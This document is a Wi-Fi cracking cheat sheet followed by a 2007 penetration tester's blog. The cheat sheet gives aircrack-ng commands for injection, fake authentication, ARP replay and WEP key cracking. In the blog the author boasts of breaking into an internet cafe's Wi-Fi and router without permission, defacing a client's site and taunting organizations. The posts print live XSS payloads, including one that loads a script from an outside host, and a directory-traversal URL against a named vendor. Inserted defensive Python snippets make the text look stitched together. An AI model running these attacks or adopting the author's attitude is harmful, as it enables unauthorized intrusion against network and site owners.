wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel
iwconfig ath0 channel n
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether <new MAC address>
ifconfig ath0 up

or use macchanger instead (macchanger -m <new MAC address> ath0, with the interface down)

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9 ath0
===================
D-Link DWL-G122

aireplay-ng -9 rausb0 (if this doesn't work it means no AP on the same channel was found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure both cards are on the same channel (channel hopping does not seem to work on the D-Link DWL-G122); to find out the current channel set, use
iwlist ath0 channel

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================



########################################################




PACKET CAPTURE:

airodump-ng <device> (find the BSSID and channel of interest first)

Then capture packets on that particular channel:

airodump-ng --channel <n> --bssid <bssid> -w dumpfile <device> (ath0 or rausb0)

Note: capture full packets when using the PTW attack (don't dump IVs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools



############################################################

ATTACKS

You may want to associate to the AP first using fake authentication before any test (the MAC addresses below are Mark's; replace -a with the AP's BSSID and -h with your card's MAC):
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic re-association (re-authenticate every 6000 seconds, one packet per burst, keep-alive every 10 seconds):
aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0

ARP replay (for WEP cracking, PTW method):
if RXQ in the airodump window is > 90 then expect #/s = 200+ (watch #Data, it counts captured IVs)

aireplay-ng --arpreplay -b <bssid> -h <source MAC> <device>

Deauthentication (to capture a WPA handshake or reveal a hidden SSID)
Fake authentication (to authenticate to the AP in case it is needed before we can inject)



#############################################################
WEP CRACKING

Using the PTW attack (version 0.9+ only); packets must be ARP (from arpreplay)

aircrack-ng -z -b <bssid> dumpfile*.cap
40-bit = 20,000 IVs
104-bit = 40,000 IVs

Normal (statistical) attack
-n 64 (test if 40-bit WEP); remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.


#######################################################

Increasing injection Speed

iwconfig device rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man

Wednesday, October 31, 2007

Hacked into a Wireless Router.

These days, I am just mad crazy. Hacking, hacking and still hacking. Basically I am dead bored and decided to see how far I can go with my hacking skills. Today, after finishing auditing a customer, I wanted to check my email as I needed to send out an urgent email. I saw an internet cafe with a Wifi connection, however encryption was on. Within a few minutes, I managed to crack their password and hacked straight into their router. With that, I managed to set up port forwarding for BitTorrent and download my favourite TV show. Well, it wasn't as thrilling as the first time I hacked into a wireless router, but still, it was a hack. How did I do it? Just by observation and some trial and error, and there you go.



The Hacka Man

Web Application Security with Joe Walker

This is a great SlideShare deck from Joe Walker with all the new hacking techniques that involve Ajax and Web 2.0. Its content is simple yet very entertaining and easily understandable. Check it out guys,



http://getahead.org/blog/joe/

The Hacka Man

Free Audit, Is it Real??

Ok, I am providing free audits for those who need my help in securing their applications or networks, and read properly: I am NOT charging a single cent for my effort in helping you. The reason for doing so is that I am giving back to the community that once helped me get where I am today. I remember I was hacking like nobody's business back in the day with trojans, port scanning, exploits, etc. I was very young then and indeed very enthusiastic about all sorts of hacking. Today, because of my busy work schedule and commitments, I tend to have less time for reading or researching. However, I am still pretty much involved in the security community when it comes to networking and web applications. There are actually quite a number of people who approached me for free auditing of their public facing web applications, and I managed to test their sites and show them what I had found. Of course, I cannot reveal any of those clients, but trust me, some of them are huge organizations and of course some are my friends.

To get a free audit, I need the following details:

1. Proof that you are the owner of the site or network.

2. Your personal details.

3. If you are from a company, use your company's email to send me an email and follow up with a call to my mobile.

4. If you are an individual, I would require you to give me a call on my mobile or Skype. Send me an email first at hackathology@gmail.com

5. If there should be any meetup, prepare a Non Disclosure Agreement for signing if required and we will discuss the Scope of Work.

I cannot guarantee I have the time to test and deliver on time for each and every customer if the request traffic is high; however, I will do my best to deliver what I promised. Also, if the scope gets larger, the delay will be longer; it all depends. Don't forget I have a day job and am doing you a favour. Lastly, should there be any changes to the audit details, I will update them here on my blog.

The Hacka Man

Tuesday, October 30, 2007

Detecting BroadVision Applications. Are they secure?

Are proprietary applications secure? Well, I guess yes and no. Security researchers are constantly looking for flaws in those applications, and only when a bug is reported will the company take action to close their loopholes. I am currently auditing a BroadVision application and what a surprise I got from my results. I am not supposed to reveal anything, but let me tell you, for a critical application like this, I am not sure if the customer is using an old version of BroadVision or it was simply never checked for sanitization. I could basically do pretty much what I wanted with that application and create havoc. Too bad I can't show anything here, but trust me, if you guys get a chance to audit a BroadVision application, you will be surprised at the kind of flaws you find. It's basically like opening a can of worms, waiting for someone to feed on it.

Well, at first I wasn't sure it was a BroadVision application; however, after some research and observation of the HTTP requests, this is what I got:

POST http://example.com/bvsn/bvcom/en/server/whereto.jsp?BV_SessionID=NNNN1809204881.10923774158NNNN&BV_EngineID=nnndaoplghjkiihcfklcfkmdgohdgih.0&BV_UseBVCookie=yes HTTP/1.0

The killer signature here is the parameter names BV_SessionID and BV_EngineID (BV_UseBVCookie is a third). If you see these anywhere in a URL or an HTTP request, you have more or less nailed down a BroadVision application. There are other indicators, like checking for the .do extension, but that wasn't seen during this audit. Google for those parameter names and you will see what I mean. I am now signing off here and going back for another round of auditing. I am going to pretty much cripple the whole application this time round.

The Hacka Man

Monday, October 29, 2007

Injection Vectors, Are you up for it?

Recently, I have been doing a lot of web penetration tests and I realised that most of the applications suffer from injection flaws. Some can be deadly and some were just pretty minor. It doesn't matter how severe the injection point is: if your site can be injected, it means there is still some sanitizing and input validation work to follow up on. Whenever I perform a penetration test on a huge organization, scanners are always deemed useless and I have to do it manually with a list of checks I keep. I managed to download a list of injection vectors from my friend Andres and that certainly saved me time Googling for attack vectors. For those who do web penetration tests, this will be very useful and will save you hours of looking, reading or searching around for information.

****************Start of the injection list*********************************

*****************************END*****************************************************

The Hacka Man

Sunday, October 28, 2007

An Important Lesson, Passive Enumeration with Paterva

I am about to be assigned to a very exciting project, and one of the most important elements of hacking is passive enumeration. I mean, to bring down an organization or its networks, passive enumeration is definitely a must! This weekend I was scouring around for effective tools that would let me perform my searches much faster and in a more logical and graphical manner, and I happened to stumble on a site called Paterva. This is a wonderful toy for passive enumeration. You can basically search for a person, DNS name, website, email, etc. and it will return results on what a person has visited, the sites he visited, the words he used, etc. Of course, instead of searching for a person, you can also perform searches for an organization. I know people are going to say that this can also be done with Google dorking. Well, that's absolutely true; Google dorking is so much more powerful, with more explosive results. However, not everyone is an expert in that area, and this is only the surface of passive enumeration. To go deeper, you would of course require certain skills like Google dorking. I am pretty happy with Paterva because of its simplicity and the ability to produce results in a more systematic manner. Try it for yourself.

http://maltego1.paterva.com/maltego-classic.html

http://www.paterva.com/web/Maltego



The Hacka Man

Friday, October 26, 2007

Citrix Hacking

A few weeks ago, pdp released an article about Citrix hacking and it actually caught my attention. I read through a total of 4 of pdp's posts and also wirepair's whitepaper on hacking Citrix. It was overall a basic yet interesting article and actually gave me an idea of how to start enumerating and hacking Citrix. Well, for my next trick, when I am about to audit Citrix soon, I will start employing the techniques that were discussed in the article and also include one of my favourite tricks of all time that would actually find flaws in the Citrix application. This would actually test how robust the Citrix application is and how it can handle certain payloads. Since Citrix is not taking security seriously according to wirepair's article, I would not hesitate to publish any flaws I find. With that being said, of course I would give them a chance to see how their response is.

The Hacka Man

Thursday, October 25, 2007

Checkpwd 2.00 A12 released

Alexander Kornbrust of Red Database Security just released the much anticipated checkpwd Oracle password cracking tool. This release has many improvements over the previous releases. Some of those include:

* support for Oracle 11g passwords
* support for APEX passwords (1.4-3.0.1)
* collect passwords from the database
* collect password candidates from the database
* option not to display the oracle password in command line
* crack passwords from the password history
* crack role passwords
* save checkpwd default configuration in a configuration file
* read username and password hashes from a file

Well, personally I had tried version 1.21 months ago and it wasn't bad after all. And now comes version 2? You bet, it will be so much more interesting to test out the new features and see how the tool produces its results. Weeks ago, THC, a German underground hacking community, released an Oracle 11g password cracker and I must admit that I haven't tried it yet, but now Alex has incorporated Oracle Database 11g password cracking abilities into checkpwd 2.00.

For those who don't know, Alex is a world renowned Oracle security expert. He is constantly reporting Oracle bugs to Oracle and has published a lot of whitepapers and given talks at conferences regarding Oracle security. I met him once in Dubai and I must say he is a humble and patient person with amazing Oracle security knowledge. To find out more, check him out at the following links:

http://www.red-database-security.com

http://blog.red-database-security.com

The Hacka Man

Sunday, October 21, 2007

Results from Hacking a huge organization

The other night I was auditing one of the customers here in Singapore. It was a huge organization with a massive workforce and manpower. Normally huge organizations tend to give people the impression that they must be secure, because either they have enough internal people to do the patching or they must be doing some kind of upgrading work every now and then to keep their servers or networks compliant with the government authority.

The results from my audit showed that life isn't a bed of roses. Multiple servers suffer from DoS and buffer overflows, and one of them even allowed me to escalate to admin privileges. Well, the results were really astonishing for such a reputable organization, and everything was under my control. Of course, I managed to capture screenshots of all I did and wrote a report to the management. I am wondering what they will do about it. They could either pray hard that no one attacks them and start patching, or expect the worst, where they could be brought down any time, any day.

One of the coolest things I did during the audit was the defacement of their website. Personally, I had never defaced a website before till that day. It was great seeing a big organization's website carrying your own selected message or picture, definitely tarnishing their reputation, and the feeling was just too ecstatic. Of course, I had to wrap it up fast by taking a screenshot of it and restoring their site back to normal, or I would be screwed. The last thing I observed and found out was that they were using a very old operating system where most of their crucial data was residing. It was exhilarating as I was poking my way in to grab all their private data. All in all, it was just bad, really bad. I am about to finish the report and send it to the customer. I just want to see what the response is going to be.

The Hacka Man

Saturday, October 20, 2007

Short update on audit

For those of you guys who are waiting for the result of the audit: because of the things I found and the sheer volume of report writing I am doing, I will only update the findings next week when I finish the report. Sorry for the wait, but thanks for the understanding.

The Hacka Man

Thursday, October 18, 2007

e... singapore, re-evaluate your website!

Well, I am roughly 10 mins away from starting the audit, but anyway, I would love to talk about e... Singapore. I heard quite a few bad things about e... Singapore, and I remember that while I was in Dubai I was asking them for a job, but in the end they voided my application. Back in Singapore, my colleagues were just talking about security companies in Singapore and they mentioned e.... I have no grudges against e..., but frankly speaking, as an MSS now trying to expand their business into the IS field, I am issuing a challenge against them. By just browsing their websites, I am pretty sure that they can be Own3d! From my guess, they could easily be using IIS 5 or 6, and of this I can be sure by just testing one of their functions, without scanning their website. As for owning them, I am pretty sure they tightened up most of the holes, EXCEPT for one. All in all, if they want to step into the IS field, the first step would be to tighten their own holes first, or else how could they convince people that they are doing IS when their own site is at risk????? e..., get your internal auditors to re-evaluate the e... website, or get me at NO cost to help you do the job.

The Hacka Man

ScanAlert, Hacker Safe?


Yesterday, I heard from my colleagues that we would be joining forces with ScanAlert and I was really puzzled by the move. I was asking myself whether ScanAlert is really Hacker Safe. Are they really that good with their scanners? Did they use open source scanners and customize them as their own? Are those clients they have really safe from hackers? Can I say that if I use ScanAlert's service to scan my website or network, I will be safe from hackers? There are a lot of questions in my head, and I think ScanAlert has a good way of doing marketing. They make every customer insert their logo onto their own site, which provides more visibility for ScanAlert's service. Well, it is good from a company point of view because they are recognized and make money out of it; however, that doesn't mean that by using their service I will be free from attackers. Not long ago, I remember members of sla.ckers.org posted XSS vulnerabilities on their site. So can I say that if I can find XSS on their site, their scanners are shitty and they are still hacker safe? I don't know, just my 2 cents worth. Anyway, I managed to dig out the XSS vector that was injected at their site some time ago; however, they have already patched it.

https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

The Hacka Man

Friday, October 12, 2007

XSS-Proxy PoC

The other day, I was thinking about how I can actually get more sales during a meeting session with customers, and with the current boom of website hacking, I thought it's time to actually show customers what I can do and the impact of an XSS vulnerability. I referred to the book "XSS Exploit and Defence" by Jeremiah and Rsnake and I decided to go with a tool called XSS-Proxy. All I can say is this tool is really light and easy to use. All you need is just Perl and a web server running on your machine, and from there one just has to launch the listener with the command "perl XSS-Proxy-shmoo_0_0_11" in the command prompt. Anton Rager actually spent some time with me explaining how this tool works and the impact of an XSS. I would like to thank him here for his time and effort. For those of you guys who would love to try this tool, download it at http://xss-proxy.sourceforge.net. There is also Advanced XSS attacks and a mini whitepaper for further reading.

First, start up xss-proxy:


Then inject a script tag into the victim page, be it persistent or reflected; try it to see how it works.


The admin page contains the links that the victim had visited, and by clicking those links, you can choose to redirect and hijack the victim browser under the same document domain.


A sample of the redirect attack. Observe the grey bar below with "Opening page..".
This is achieved by clicking on one of the links the victim had visited on the admin page: I wanted the victim to visit another page, so I chose the link I wanted the victim to visit and clicked on it. On the victim side, he will automatically be redirected to the page I chose.


And finally, I can even proxy JavaScript injection in the victim browser. A simple one would be alert('XSS');


The Hacka Man

Wednesday, October 10, 2007

AppCodeScan beta Released

A few minutes ago, Shreeraj just updated me with the release of a new tool from Blueinfy. This tool basically checks your source code for potential entry points for XSS, SQL injection, poor validation etc. Well, personally I have not tested the tool due to time constraints and my busy schedule. I would strongly recommend anyone who has the time to actually download the tool and give it a try; it's free anyway. The tool is called AppCodeScan, and for those who have already tried the tool, feel free to let me know, as trust me, I am really eager to try this. Also, check out Fortify's source code scanning tool, which has similar functions and usage. The only difference is maybe the support, and that it's an enterprise tool. At the same time, do check out their cost and you will know why Shreeraj is so generous to make it free. Of course, you can customize the ruleset to suit your application if you know how to. Thank you Shreeraj.

http://blueinfy.com/tools.html

The Hacka Man

Monday, October 8, 2007

Try this at your own risk, COKE Machine hacked!!

I was checking pdp's hack on Citrix and I stumbled across a coke machine hack. Well, I am not sure if this is an old exploit, if it is still working as of today, or if it is patched. However, I could not replicate this hack on a vending machine here. Maybe it is a different model or a different system or a different chipset. Whatever it is, this is a cool one. Simple yet effective.



The Hacka Man

Sunday, October 7, 2007

Just another XSS

Well, I am getting tired of your site, "big organization". PoC shown with screenshots of your site being XSSed numerous times. Just patch up quick and you will be alright. Hire me or get someone to do the job. Whatever you decide, I wish you good luck and all the best.



The Hacka Man

Saturday, October 6, 2007

Prevention is better than Cure

With over 6 years of experience in penetration tests of all sorts of systems, from networks to web applications to databases and many more, I can say that I have successfully achieved my goals as a "hacker" or a white hat. As usual, I am constantly keeping myself abreast of the latest exploits and hacking methodology. I am not really a true researcher, but rather a guy who loves to read all sorts of hacking books and articles.

Well, with the recent work I am doing on web applications, I can say that most web applications are truly not secure and are hackable, except for a few out there. It all boils down to the developers and the customers. Those customers have no idea of how important secure programming is. Once they are hacked, their reputation is gone and data is lost. From what I see, customers are always eager to launch their application online, maybe because of a certain time frame they have to meet or maybe because they are eager to let the consumers know more about their services and products, but they did not think about security on their applications as a whole. Well, I would advise them to think twice and think about the possibility of being hacked hard. Below are a few guidelines that I got from Jeremiah's whitepaper; after reading it, I feel that it is important to embrace it, rather than treating it just like another whitepaper.

Secure Code: Application developers must consider security from the beginning. Involve the security staff early in the process.

QA Development: Experienced staff must perform periodic security as well as usability reviews.

Stay up-to-date on patches and configured securely.

Continuous assessments: Covering both technical and logical issues on the production web site as it's being changed.

Also, for those who are paranoid about your web applications and have no budget to spend, you guys should install a Web Application Firewall like ModSecurity to shield off most of the attacks; moreover, it is customizable, and you can add your own ruleset. There are also a few other open source WAFs like PHP-IDS for XSS, URLScan for IIS and some others. Commercial ones are available too. It all depends on how much you can spend and what you really need.

The Hacka Man

Friday, October 5, 2007

Another hole????

Hey "big organization", no explanation needed. You have been owned again. Well, I am smart not to let you see the actual URL string, else you will secure yourself? Still call me a script kiddie?? Think harder. Challenge me?? Why not do something about your site rather than challenging people here and there? Need to know the actual payload and URL string? Call me. You are lucky I didn't use XSS to portscan your internal network or cause a defacement and make you look like a fool. Respect others and respect yourself.



The Hacka Man

Thursday, October 4, 2007

You are OwNED!!!

Hey "big organization", I don't think I need to prove too much. Check out your logs or something. Check out whatever you have. I just spent roughly 5 minutes on your site and I got what I wanted. Well, I don't think you are worth my precious time doing good for your site. This is just a simple test. I can do more damaging stuff, but well, I don't see the point of doing more damage. I don't have to prove any more. Take this shit from me and do your part. Peace.



The Hacka Man

Wednesday, October 3, 2007

Challenge me on Web Application Security???

One day after the application penetration test, I was contacted by a huge organization who apparently viewed/read my blog. Basically they issued a challenge to test my knowledge and skills in web application security assessment. Well, I don't really care or bother how huge your organization is; I accept your challenge and I will show you that your public facing website will be used as a zombie for unidentified attacks. Don't blame me for that. You issued a challenge and I responded. I don't have anything to prove, except that I would love to see how good your web security is.

The Hacka Man

Tuesday, October 2, 2007

Session ID Manipulation?????

So today is the last day of Phase 1 of my application pentest. Well, it's always funny because it's always on the last day that I find something. In my previous posts, I was saying that the application is very secure. However, I found some session ID manipulation that allows an attacker to impersonate someone. Well, although it's not high risk, think of this situation. Let's say you and your friend are at a school compound or somewhere with network access and suddenly your friend is checking his account. With the mindset of a hacker, you know that manipulating the session ID will allow you to gain access to his account, so when he says that he wants to go to the toilet and forgets to log out, you quickly grab his session ID and then change his password. From there on, you can monitor his account's transactions and status, and moreover you can transfer money to your own account. I mean, there are too many possibilities. This is just one of the scenarios. You can let your imagination run wild and come up with more evil stuff. However, I just want to point out that since that application is already so secure, why not take another step to tighten this hole? Agree?????

The Hacka Man

Monday, October 1, 2007

Owning Axis IP Cameras

Over the weekend, I had the time to review a whitepaper written by both Adrian Pastor and Amir Azam. In that article, they displayed certain XSS techniques that allowed an attacker to own the IP cameras and monitor them. Well, I would say that this is not too bad of an article, as the PoC is included. It is still the same old XSS that is doing the trick, and CSRF that allows creation of admin accounts. The firmware for Axis is just crap. They should brush up on their security to avoid more security issues. For those who are interested, do check it out at

http://www.gnucitizen.org/blog/owning-big-brother-hollywood-style-exploits-included


The Hacka Man

2 Factor Authentication Last Update

I think I am more or less done with my scope of work. There is simply no chance in hell that I can break that application. It's like no matter what I entered, I always got a "service not available" or "please try again later". I verified all the injection points and the stuff that I can inject. Still, nothing can be done. The application is so sensitive and secure that it validates all input characters and escapes all output characters. Lastly, every error message that is output is a generic error message with no other information. The one last thing I am trying now is XSS on a 404 error page, to see how it reacts. Still, this is what I got:



And the generated source I got after the XSS:

[404 Not Found
Not Found
The requested URL /x/--><script>alert("XSS")</script><!--&node=465600 was not found on this server.]

The Hacka Man

Sunday, September 30, 2007

Have you downloaded your scancode?

I was reading Shreeraj's article about source code review and it was overall a basic yet simple article on source code reviewing. Basically in the article, he takes the audience from dependency determination to mitigation and countermeasures for a web application. On top of it, he included a tool he coded himself called "scancode", which is used to scan source code for potential entry points for XSS and SQLi. This is a must read for those who want to know more about the source code reviewing process and methodology. Download scancode at page 3 of the article, right at the bottom.

http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html

These days, I am so involved with application security that I have neglected the networking area. Well, I am trying to shift myself slowly away from the technical side of things and wish to be more involved in business and development stuff. However, I will still keep myself abreast of the latest stuff that is going around in the security world.

The Hacka Man

Adobe Directory Traversal???????

The other night Christ1an showed me a link on Adobe.com with directory traversal. It was an old exploit; however, it worked on Adobe. This showed how Adobe is not taking application security seriously. Well, I managed to see the entire /etc/passwd file and DAMN!! I did not take a screenshot of it. I was too careless and excited to take a screenshot. The following day, the issue was resolved, with reports being made to Adobe. Well, check out the exploit here that was used against Adobe:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd

Add a null byte character at the end of passwd. Please note that the exploit will not work anymore. However, this is the actual string I used a few nights ago.

The Hacka Man
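From the defender's side, the string above fails on two counts at once: the ../ components walk out of the download directory, and the trailing null byte truncates whatever suffix the script appends. The Python below is an added example, not code from this blog or from Adobe; the download root, the ".txt" suffix and the allowed token shape are constructed assumptions, since the real script's layout is unknown.

```python
import os
import re
from typing import Optional

# Constructed assumptions: where version files live and what a valid name looks like.
DOWNLOAD_ROOT = "/var/www/downloads"
VERSION_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

# The traversal value quoted in the post, plus the null-byte variant it describes.
TRAVERSAL = "../../../../../../../../../etc/passwd"
TRAVERSAL_NUL = TRAVERSAL + "\x00"


def naive_resolve(prod_version: str, root: str = DOWNLOAD_ROOT) -> str:
    """The vulnerable pattern: join the parameter onto the root and normalise it.

    normpath happily collapses the ../ components, so the result walks out of root.
    """
    return os.path.normpath(os.path.join(root, prod_version))


def resolve_download(prod_version: str, root: str = DOWNLOAD_ROOT) -> Optional[str]:
    """Hardened resolver: a path under root, or None when the value is rejected."""
    # 1. Embedded NUL: C-level file APIs stop reading the string there, so any
    #    suffix the application appends (".txt" below) would be silently discarded.
    if "\x00" in prod_version:
        return None
    # 2. Allow-list the token shape: no path separators, no leading dot.
    if not VERSION_RE.match(prod_version):
        return None
    # 3. Canonicalise and confirm the result still lives under root. The allow-list
    #    already guarantees this; the check is defence in depth against later edits.
    root_norm = os.path.normpath(root)
    candidate = os.path.normpath(os.path.join(root_norm, prod_version + ".txt"))
    if os.path.commonpath([root_norm, candidate]) != root_norm:
        return None
    return candidate


if __name__ == "__main__":
    for value in (TRAVERSAL, TRAVERSAL_NUL, "sw_11_0_1"):
        print(repr(value), "->", naive_resolve(value), "|", resolve_download(value))
```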

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as hashmaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing; however, I am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hash string into the form, and the program will work out the hashing algorithm used. This is rather useful, because once you know the hashing algorithm, you can then use cracking software to crack the actual passwords. Well, good work Rsnake, you actually made my job easier!

http://ha.ckers.org/hashmaster

The Hacka Man

Friday, September 28, 2007

Can Your Machine Be Hacked?

Last night, I received an email from Rich McIver and he gave me a link to publish. Basically, in his post, he provides users with ideas of how to secure holes in your PC. There are 12 tests, all of which give a rough idea of how to secure your machine. Well, I would say it is a good start for those who want to start learning about security overall. Check it out:

http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/

The Hacka Man

Thursday, September 27, 2007

Blueinfy.com

Want to know more about Web 2.0 hacking?
Want to have free Web 2.0 auditing tools and articles?
Want to know more about web security and hacking?

You will have to check out Blueinfy.com; it is definitely a site worth visiting, with great in-depth articles and simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj Shah, an ex-employee of Foundstone USA. Google him and you will know how powerful he is :)

The Hacka Man

XSS on a vendor's website

I am still testing the application for flaws. However, it is so secure that I can't do a single thing. In the end, I ended up testing a vendor's site for XSS. The vendor did a good job of escaping < and > characters and it gave me <SCRIPT>alert(2)</SCRIPT> when I viewed the source code. I was dejected, as I knew there was something more I could do. A few minutes later, .mario was online and I told him about my problem. Immediately, he came up with a trick that allows XSS to happen. So in the end, I entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into one of the form fields, and when I viewed the source code, it was totally injected! This was what was displayed in the source code:

[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]

Thank you .mario, you helped me understand XSS a lot more.

The Hacka Man
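The 404 page in the October 1 post and this vendor form show the same defect from two angles: output encoding that ignores the HTML context. Reflecting the URL verbatim lets a tag through; escaping only < and > stops the tag but not a quote that closes the value attribute and starts new ones. The Python below is an added example, not code from this blog or from the sites tested; the two templates and the weak escaper are constructed to mirror what the posts describe.

```python
import html
import re
from typing import Callable

# Constructed inputs modelled on the two posts: the path the 404 page reflected,
# and the attribute-breaking value entered into the vendor's form field.
REFLECTED_404_PATH = '/x/--><script>alert("XSS")</script><!--&node=465600'
ATTR_PAYLOAD = '" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="'

Escaper = Callable[[str], str]


def no_escape(value: str) -> str:
    """Reflect the value verbatim, as the 404 page in the post did."""
    return value


def escape_angle_only(value: str) -> str:
    """Neutralise tags only; what the vendor's filter appears to have done."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def escape_html(value: str) -> str:
    """Encode & < > " and ': safe in text content and inside quoted attributes."""
    return html.escape(value, quote=True)


def render_404(path: str, escaper: Escaper) -> str:
    """Constructed template for the Apache-style 404 body quoted in the post."""
    return f"<p>The requested URL {escaper(path)} was not found on this server.</p>"


def render_hidden_input(name: str, value: str, escaper: Escaper) -> str:
    """Constructed template for the hidden field quoted in the vendor post."""
    return f'<input name="{name}" value="{escaper(value)}" type="hidden">'


def count_attributes(tag: str) -> int:
    """Count name="..." pairs in one tag; a value that breaks out adds extra pairs."""
    return len(re.findall(r'\s[\w-]+="[^"]*"', tag))


def attribute_breakout(value: str, escaper: Escaper) -> bool:
    """True when the rendered hidden input carries more than its three attributes."""
    return count_attributes(render_hidden_input("TxnEnd_Param", value, escaper)) > 3


def reflects_script(path: str, escaper: Escaper) -> bool:
    """True when a raw <script> tag survives into the 404 body."""
    return "<script>" in render_404(path, escaper).lower()


if __name__ == "__main__":
    for label, esc in (("none", no_escape), ("angle-only", escape_angle_only), ("full", escape_html)):
        print(f"{label:10s} 404 reflects <script>: {reflects_script(REFLECTED_404_PATH, esc)}"
              f"  attribute breakout: {attribute_breakout(ATTR_PAYLOAD, esc)}")
```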

Tuesday, September 25, 2007

2 Factor Authentication Update

I don't believe this, I basically can't do a SQL injection, CSRF or XSS! Everything I want to do is basically either encrypted, or if I inject a simple character like ", it says service unavailable. This application can be considered very secure in terms of encryption, and of good standard if weighing it against the OWASP Top Ten. Even if I enter a value like 10, this value will be encrypted like this:

Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU

I am running out of ideas, tell me what more can I do??

The Hacka Man

2 Factor Authentication Day 2

Damn, it's getting tough! Have you guys seen a 6 digit password with an encrypted string this long?

ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120

Well, is there nothing more I can do? I dunno, still thinking:?????

The Hacka Man

Monday, September 24, 2007

2 Factor Authentication?

Well, if you guys asked me why I haven't been updating my blog, I can only say that there is so much to be done at work, and of course a lot of reading of Rsnake's XSS Exploit and Defence. I've been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions.

